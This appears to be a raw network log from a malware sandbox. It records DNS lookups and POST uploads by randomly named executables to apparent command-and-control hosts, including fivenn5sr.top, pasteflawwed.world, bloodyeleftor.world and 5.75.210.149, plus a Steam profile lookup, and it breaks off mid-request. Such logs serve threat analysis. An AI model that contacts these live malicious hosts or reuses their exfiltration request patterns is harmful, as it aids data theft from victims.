                                                                                              accept-language: en-US,en;q=0.9
                                                                                            • flag-us
                                                                                              DNS
                                                                                              ogads-pa.googleapis.com
                                                                                              chrome.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              ogads-pa.googleapis.com
                                                                                              IN A
                                                                                              Response
                                                                                              ogads-pa.googleapis.com
                                                                                              IN A
                                                                                              142.250.178.10
                                                                                              ogads-pa.googleapis.com
                                                                                              IN A
                                                                                              172.217.169.42
                                                                                              ogads-pa.googleapis.com
                                                                                              IN A
                                                                                              142.250.200.42
                                                                                              ogads-pa.googleapis.com
                                                                                              IN A
                                                                                              142.250.187.202
                                                                                              ogads-pa.googleapis.com
                                                                                              IN A
                                                                                              216.58.201.106
                                                                                              ogads-pa.googleapis.com
                                                                                              IN A
                                                                                              172.217.16.234
                                                                                              ogads-pa.googleapis.com
                                                                                              IN A
                                                                                              216.58.204.74
                                                                                              ogads-pa.googleapis.com
                                                                                              IN A
                                                                                              216.58.213.10
                                                                                              ogads-pa.googleapis.com
                                                                                              IN A
                                                                                              142.250.200.10
                                                                                              ogads-pa.googleapis.com
                                                                                              IN A
                                                                                              216.58.212.202
                                                                                              ogads-pa.googleapis.com
                                                                                              IN A
                                                                                              142.250.179.234
                                                                                              ogads-pa.googleapis.com
                                                                                              IN A
                                                                                              142.250.187.234
                                                                                              ogads-pa.googleapis.com
                                                                                              IN A
                                                                                              172.217.169.10
                                                                                              ogads-pa.googleapis.com
                                                                                              IN A
                                                                                              142.250.180.10
                                                                                            • flag-us
                                                                                              DNS
                                                                                              fivenn5sr.top
                                                                                              90ced29b15.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              fivenn5sr.top
                                                                                              IN A
                                                                                              Response
                                                                                              fivenn5sr.top
                                                                                              IN A
                                                                                              185.72.145.179
                                                                                            • flag-us
                                                                                              DNS
                                                                                              fivenn5sr.top
                                                                                              90ced29b15.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              fivenn5sr.top
                                                                                              IN AAAA
                                                                                              Response
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://fivenn5sr.top/v1/upload.php
                                                                                              90ced29b15.exe
                                                                                              Remote address:
                                                                                              185.72.145.179:80
                                                                                              Request
                                                                                              POST /v1/upload.php HTTP/1.1
                                                                                              Host: fivenn5sr.top
                                                                                              Accept: */*
                                                                                              Content-Length: 71613
                                                                                              Content-Type: multipart/form-data; boundary=------------------------shxtM70crZxS540HAwnhdZ
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              server: nginx
                                                                                              date: Thu, 20 Feb 2025 00:33:46 GMT
                                                                                              content-type: text/plain; charset=utf-8
                                                                                              content-length: 2
                                                                                              x-ratelimit-limit: 30
                                                                                              x-ratelimit-remaining: 28
                                                                                              x-ratelimit-reset: 1740013425
                                                                                              etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                            • flag-us
                                                                                              DNS
                                                                                              play.google.com
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              play.google.com
                                                                                              IN A
                                                                                              Response
                                                                                              play.google.com
                                                                                              IN A
                                                                                              142.250.178.14
                                                                                            • flag-us
                                                                                              DNS
                                                                                              wildpadventures.tech
                                                                                              9aiiMOQ.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              wildpadventures.tech
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://pasteflawwed.world/api
                                                                                              9aiiMOQ.exe
                                                                                              Remote address:
                                                                                              104.21.86.17:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: pasteflawwed.world
                                                                                              Response
                                                                                              HTTP/1.1 403 Forbidden
                                                                                              Date: Thu, 20 Feb 2025 00:33:46 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x%2BsEJLEHmB%2FaZGggkJQRWprcfXw1%2BHRRsjjaV1AC0dQNnJdQt1B2yYozpT5BuM5gFbGHC4nHLThjKrST%2BGl23V083Ws3Ba3iL7uJLmxgUxr6NfnWZc4k61Ck1R2job0O4QzTvQY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a683c8ca686d0-LHR
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://pasteflawwed.world/api
                                                                                              9aiiMOQ.exe
                                                                                              Remote address:
                                                                                              104.21.86.17:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=qme.6ZYr1a.7LyIkwkK5fTNJhyTxUAXbWMImkutuqpM-1740011626-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 55
                                                                                              Host: pasteflawwed.world
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:47 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=217vofl5jettfn5nrig241pr7t; expires=Fri, 21 Feb 2025 00:33:47 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0rzYMq7EyIL4QFXZ%2BbK8qs4OLB67Lknqvs7cCsEQjTxHlR5s3a07yM6UgL2XAEdXYusqbLLQIz6mbpu5VpYlBq9uO6ple4%2FhWvrZ%2Fui15LA4ydLrDNk0S9LbquAG8GCZ9A5nGDc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a683cdd1c86d0-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=44361&min_rtt=41988&rtt_var=7872&sent=13&recv=12&lost=0&retrans=0&sent_bytes=8572&recv_bytes=1077&delivery_rate=192760&cwnd=257&unsent_bytes=0&cid=9842a4d7a3e05c2b&ts=406&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://pasteflawwed.world/api
                                                                                              9aiiMOQ.exe
                                                                                              Remote address:
                                                                                              104.21.86.17:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=L1UZE2QOVIIQI
                                                                                              Cookie: __cf_mw_byp=qme.6ZYr1a.7LyIkwkK5fTNJhyTxUAXbWMImkutuqpM-1740011626-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1615
                                                                                              Host: pasteflawwed.world
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:47 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=ljv6uu1ak0v6uf468dbc2peheb; expires=Fri, 21 Feb 2025 00:33:47 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bRItQWqa39wuhMkRzLAKUJXZDVNlvmYhYoFJwAi8mWUHRIntRCgI9%2BCFhK8EARdIQ0S6izuaYyKK7PEfxaIfme3OsrheBp%2Fh%2Fn8pv5JtvBWLcbIgXkkK5bKzHS4TMafXr0dpoEc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a683fea8386d0-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=44081&min_rtt=41988&rtt_var=6465&sent=17&recv=16&lost=0&retrans=0&sent_bytes=9745&recv_bytes=3117&delivery_rate=192760&cwnd=257&unsent_bytes=0&cid=9842a4d7a3e05c2b&ts=807&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://pasteflawwed.world/api
                                                                                              9aiiMOQ.exe
                                                                                              Remote address:
                                                                                              104.21.86.17:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=A5CC2O0XU5YKLW
                                                                                              Cookie: __cf_mw_byp=qme.6ZYr1a.7LyIkwkK5fTNJhyTxUAXbWMImkutuqpM-1740011626-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1099
                                                                                              Host: pasteflawwed.world
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:48 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=h07it3vft5ev5435fjk4ng2dbv; expires=Fri, 21 Feb 2025 00:33:48 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1CHHuszgM6FhAeYZA2U%2BnMmFU6XuC4p%2ByNAZxqkpZoJegULMagLqLAyH%2FQCvNCpjnhtWvTVZ11mQMmjAij9RRVFFvn%2FsSxQDgPkfMvQZPOrFoNBuF2hw7iU%2B3F%2FIsjCEbTMh%2Fug%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a6842b85d88cb-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=42881&min_rtt=41993&rtt_var=10267&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3299&recv_bytes=1803&delivery_rate=93881&cwnd=253&unsent_bytes=0&cid=fa3bfc8548911270&ts=351&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://pasteflawwed.world/api
                                                                                              9aiiMOQ.exe
                                                                                              Remote address:
                                                                                              104.21.86.17:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=qme.6ZYr1a.7LyIkwkK5fTNJhyTxUAXbWMImkutuqpM-1740011626-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 89
                                                                                              Host: pasteflawwed.world
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:48 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=finuaplontc29vbenl51prhhtu; expires=Fri, 21 Feb 2025 00:33:48 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BpnhDjUE%2FqDEsDE3i5aIzwCCno0g9wAGb8Xf2HUvVnEHuVnghg8%2FY1n9KoRByh796ca3lXaNXr0u4lJb03izkDeTWm7yojE%2B%2FQD5Ec7YOmjRI6%2FEqFJHcwFNXu%2Fwqcpq77IXREk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a6845bcf84190-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=43123&min_rtt=41596&rtt_var=11589&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3299&recv_bytes=780&delivery_rate=91282&cwnd=253&unsent_bytes=0&cid=51645285a0ef31d9&ts=269&x=0"
                                                                                            • flag-us
                                                                                              DNS
                                                                                              microsoft.com
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              microsoft.com
                                                                                              IN A
                                                                                              Response
                                                                                              microsoft.com
                                                                                              IN A
                                                                                              20.112.250.133
                                                                                              microsoft.com
                                                                                              IN A
                                                                                              20.231.239.246
                                                                                              microsoft.com
                                                                                              IN A
                                                                                              20.70.246.20
                                                                                              microsoft.com
                                                                                              IN A
                                                                                              20.236.44.162
                                                                                              microsoft.com
                                                                                              IN A
                                                                                              20.76.201.171
                                                                                            • flag-us
                                                                                              DNS
                                                                                              microsoft.com
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              microsoft.com
                                                                                              IN MX
                                                                                              Response
                                                                                              microsoft.com
                                                                                              IN MX
                                                                                              microsoft-com.mail.protection.outlook.com
                                                                                            • flag-us
                                                                                              DNS
                                                                                              microsoft-com.mail.protection.outlook.com
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              microsoft-com.mail.protection.outlook.com
                                                                                              IN A
                                                                                              Response
                                                                                              microsoft-com.mail.protection.outlook.com
                                                                                              IN A
                                                                                              52.101.8.49
                                                                                              microsoft-com.mail.protection.outlook.com
                                                                                              IN A
                                                                                              52.101.42.0
                                                                                              microsoft-com.mail.protection.outlook.com
                                                                                              IN A
                                                                                              52.101.40.26
                                                                                              microsoft-com.mail.protection.outlook.com
                                                                                              IN A
                                                                                              52.101.11.0
                                                                                            • flag-us
                                                                                              DNS
                                                                                              rebeldettern.com
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              rebeldettern.com
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              importenptoc.com
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              importenptoc.com
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-de
                                                                                              POST
                                                                                              https://5.75.210.149/
                                                                                              7aencsM.exe
                                                                                              Remote address:
                                                                                              5.75.210.149:443
                                                                                              Request
                                                                                              POST / HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----noh47g4eusr1vaa1nozc
                                                                                              Host: 5.75.210.149
                                                                                              Content-Length: 1117
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Thu, 20 Feb 2025 00:33:51 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-us
                                                                                              DNS
                                                                                              voicesharped.com
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              voicesharped.com
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              inputrreparnt.com
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              inputrreparnt.com
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              torpdidebar.com
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              torpdidebar.com
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              actiothreaz.com
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              actiothreaz.com
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              garulouscuto.com
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              garulouscuto.com
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              breedertremnd.com
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              breedertremnd.com
                                                                                              IN A
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              steamcommunity.com
                                                                                              BitLockerToGo.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              steamcommunity.com
                                                                                              IN A
                                                                                              Response
                                                                                              steamcommunity.com
                                                                                              IN A
                                                                                              104.82.234.109
                                                                                            • flag-gb
                                                                                              GET
                                                                                              https://steamcommunity.com/profiles/76561199822375128
                                                                                              198cfc7201.exe
                                                                                              Remote address:
                                                                                              104.82.234.109:443
                                                                                              Request
                                                                                              GET /profiles/76561199822375128 HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Host: steamcommunity.com
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://steamloopback.host https://store.steampowered.com/;
                                                                                              Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                              Cache-Control: no-cache
                                                                                              Date: Thu, 20 Feb 2025 00:33:51 GMT
                                                                                              Content-Length: 35769
                                                                                              Connection: keep-alive
                                                                                              Set-Cookie: sessionid=404c68a6a317a158bee92dbd; Path=/; Secure; SameSite=None
                                                                                              Set-Cookie: steamCountry=GB%7Cdcacbc5cf7f4b2dc1ed43dd213cf0dc5; path=/; secure; HttpOnly; SameSite=None
                                                                                            • flag-de
                                                                                              POST
                                                                                              https://5.75.210.149/
                                                                                              7aencsM.exe
                                                                                              Remote address:
                                                                                              5.75.210.149:443
                                                                                              Request
                                                                                              POST / HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----db1djeu3wbsrqiw4wlx4
                                                                                              Host: 5.75.210.149
                                                                                              Content-Length: 218917
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Thu, 20 Feb 2025 00:33:52 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-us
                                                                                              DNS
                                                                                              bloodyeleftor.world
                                                                                              c6a31d1295.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              bloodyeleftor.world
                                                                                              IN A
                                                                                              Response
                                                                                              bloodyeleftor.world
                                                                                              IN A
                                                                                              104.21.63.231
                                                                                              bloodyeleftor.world
                                                                                              IN A
                                                                                              172.67.172.150
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://bloodyeleftor.world/api
                                                                                              198cfc7201.exe
                                                                                              Remote address:
                                                                                              104.21.63.231:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 8
                                                                                              Host: bloodyeleftor.world
                                                                                              Response
                                                                                              HTTP/1.1 403 Forbidden
                                                                                              Date: Thu, 20 Feb 2025 00:33:51 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uXJoaTc%2BdyzpjouVNXlcN39NW%2FOHE7UfAYFSFjZqnkvfy2tEoS91jDtRuuIew%2FuP1qhVwBwuP4G5pp7EXmBI%2BpxgufGu6WHfHbtzd%2F6mZtTNL3nWkHQ%2BBxk9KcDDN5EzvldIbnWq"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a6858accf539c-LHR
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://bloodyeleftor.world/api
                                                                                              198cfc7201.exe
                                                                                              Remote address:
                                                                                              104.21.63.231:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cookie: __cf_mw_byp=lq2YwPMmrfMe6Y8F_MYyCFgkxlqWDhwa5qqWv0i1Cr0-1740011631-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 42
                                                                                              Host: bloodyeleftor.world
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:51 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=qnro1pdfds747h6btm5qsd16oo; expires=Fri, 21 Feb 2025 00:33:51 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iI3F5RoHRxEW5N%2BPdRETVm%2Fy6AjbqS%2BpYccqIFgbDTEUBVZW9sxv7YN7gNxiroaFal%2Bd78GLSkiyCie6xc%2FxhmnyH0JagJJz3ccBJOYoGPlVzLUbBUzBq9T14xv7%2FGRag5H3i3f6"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a68590d0d539c-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=42450&min_rtt=41849&rtt_var=4208&sent=13&recv=12&lost=0&retrans=0&sent_bytes=8582&recv_bytes=1067&delivery_rate=191599&cwnd=257&unsent_bytes=0&cid=de8d8973d2242c9a&ts=377&x=0"
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://bloodyeleftor.world/api
                                                                                              198cfc7201.exe
                                                                                              Remote address:
                                                                                              104.21.63.231:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=S49YJ1BO19
                                                                                              Cookie: __cf_mw_byp=lq2YwPMmrfMe6Y8F_MYyCFgkxlqWDhwa5qqWv0i1Cr0-1740011631-0.0.1.1-/api
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 1579
                                                                                              Host: bloodyeleftor.world
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:33:52 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                              Vary: Accept-Encoding
                                                                                              Set-Cookie: PHPSESSID=5ic75np658ot56gpvpiepan4d1; expires=Fri, 21 Feb 2025 00:33:51 GMT; Max-Age=86400; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ppMZuh6YomZhUQX6bfNKRcvx%2B6oOv2aIsuX4N6V5IImYM7bBA0%2F%2F72XXlY%2B8%2FMr1Pv11io5lqTlH6D3dMTFseHIUWR2Dq2t2KuOlODS3Hoi6xUU8jmJvTGU1OfTDUb%2FDMdN1rqAM"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 914a685b6f1e539c-LHR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=42416&min_rtt=41849&rtt_var=3225&sent=16&recv=16&lost=0&retrans=0&sent_bytes=9759&recv_bytes=3069&delivery_rate=191599&cwnd=257&unsent_bytes=0&cid=de8d8973d2242c9a&ts=637&x=0"
                                                                                            • flag-us
                                                                                              DNS
                                                                                              vanaheim.cn
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              vanaheim.cn
                                                                                              IN A
                                                                                              Response
                                                                                              vanaheim.cn
                                                                                              IN A
                                                                                              2.59.161.190
                                                                                            • flag-de
                                                                                              POST
                                                                                              https://5.75.210.149/
                                                                                              7aencsM.exe
                                                                                              Remote address:
                                                                                              5.75.210.149:443
                                                                                              Request
                                                                                              POST / HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----0z58g4wlnycje3ohvas0
                                                                                              Host: 5.75.210.149
                                                                                              Content-Length: 55081
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Thu, 20 Feb 2025 00:33:52 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-us
                                                                                              POST
                                                                                              https://bloodyeleftor.world/api
                                                                                              198cfc7201.exe
                                                                                              Remote address:
                                                                                              104.21.63.231:443
                                                                                              Request
                                                                                              POST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
